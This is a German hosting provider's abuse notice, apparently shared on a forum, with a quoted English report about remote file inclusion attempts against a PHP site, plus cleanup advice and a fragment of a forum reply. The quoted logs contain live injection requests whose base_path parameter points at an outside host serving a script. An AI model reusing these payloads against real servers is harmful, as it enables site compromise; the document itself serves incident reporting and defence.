Sehr geehrte Damen und Herren,
wir haben eine Beschwerde erhalten, da Ihr Server anscheinend Daten an Server Dritter sendet, die sich dadurch gestört fühlen (Portscans, Bruteforce-Attacken, Kompromittierungsversuche o.ä.) bzw. die Stabilität unseres Netzes beeinträchtigen. Die uns vorliegenden Daten sind unten angegeben.
In den meisten Fällen entstehen solche Probleme durch unsichere
PHP-Skripte und CGIs. Oft reicht es aus, die eingeschleusten
Applikationen (nach Erstellung einer Kopie!) zu entfernen und die unsicheren Skripte zu löschen oder abzusichern. Sie sollten also zunächst Ihr System nach Schwachstellen durchsuchen und herausfinden, auf welchem Wege schädliche Skripte eingeschleust wurden.
Manchmal tritt dieses Phänomen auch auf, wenn Ihr Rechnern von Angreifern übernommen (vulgo: "gehackt") und root/Administrator-Zugang erlangt wurde. Dies ist z.B. möglich, wenn Sicherheitslücken in Diensten bestehen, die nicht durch Updates behoben wurden.
Der Server wurde aufgrund der beschriebenen Aktivitäten von uns heruntergefahren.
Sie können das System allerdings selbst jederzeit wieder starten, um sich des Problems anzunehmen. Bei Virtual Servern ist dies über das VZPP, bei anderen Servern über das Remote Management oder einen Reboot-Auftrag möglich.
Bitte antworten Sie so bald wie möglich auf diese E-Mail, wenn Sie das Problem selbstständig beheben oder anderweitig klären konnten. Bitte antworten Sie auf diese Anfrage per E-Mail, da unser Telefonsupport Ihnen keine weiteren Auskünfte geben kann.
Wir bitten IN JEDEM Fall um eine RÜCKMELDUNG!!
Wenn wir keine Rückmeldung von Ihnen erhalten, der Server aber trotzdem wieder gestartet wird, sind wir bei Anhalten des Problems gezwungen, den Server (auch zu Ihrer Sicherheit) bis zu einer Reaktion durch Sie vom Netz zu nehmen.
> Greetings:
>
> IP Address of attacker: 92.51.134.76
>
> Type of attack: URL Injection -- attempt to inject / load files onto the
> server via PHP/CGI vulnerabilities
>
> Sample log report including date and time stamp (1st field is "request", 2nd
> field is the IP address or the domain name being attacked, and the 3rd field
> is the IP address or domain name of the attacker):
>
> Request: artistictile.net 92.51.134.76 - - [20/Apr/2009:20:10:35 -0400]
> "GET
> /amp-3.2/includes/base.php?base_path=http://www.sangabuay.com/p/info.txt???
> HTTP/1.1" 500 546 "-" "libwww-perl/5.806" - "-"
>
> Request: artistictile.net 92.51.134.76 - - [20/Apr/2009:20:10:36 -0400]
> "GET
> /frameset%20pages/store/accessories/amp-3.2/includes/base.php?base_path=http
> ://www.sangabuay.com/p/info.txt??? HTTP/1.1" 500 546 "-" "libwww-perl/5.806"
> - "-"
>
> Request: artistictile.net 92.51.134.76 - - [20/Apr/2009:20:10:37 -0400]
> "GET
> /frameset%20pages/store/accessories/nuheat_prices.html/amp-3.2/includes/base
> .php?base_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 500 546 "-"
> "libwww-perl/5.806" - "-"
>
> NOTES:
>
> URL Injection attacks typically mean the server for which the IP address of
> the attacker is bound is a compromised server.
>
> Please check the server behind the IP address above for suspicious files in
> /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox,
> /var/spool/squid, and /var/spool/cron Please use "ls -lab" for checking
> directories as sometimes compromised servers will have hidden files that a
> regular "ls" will not show.
>
> Please also check the process tree (ps -efl or ps -auwx) for suspicious
> processes; often times the malware / hack pretends to be an Apache process.
>
> Clam Anti-virus, clamscan, can also be used to find commonly used PHP and
> Perl-based hacks, including various php shells, on a server using the
> "--infected" and "--recursive" options.
>
> You may also want to check out using root kit detection tools -
>
chkrootkit -- locally checks for signs of a rootkit,
Rootkit.nl - Protect your machine, and http://
>
Rootcheck Project as tools which should be used in
> addition to checking the directories and process tree.
>
> ### EOF NOTES ###
>
> Please take appropriate action to stop these attacks from happening.
>
> Thank you very much for your time.
. Es sei denn, Du brauchst die Maschine unbedingt. Auch ist noch kein Meister vom Himmel gefallen. Lehrgeld zahlt jeder, auch der SuperDuperAdmin ist irgendwann an der Reihe. So ist das nun einmal. 
und studiere die Dokumentation. 
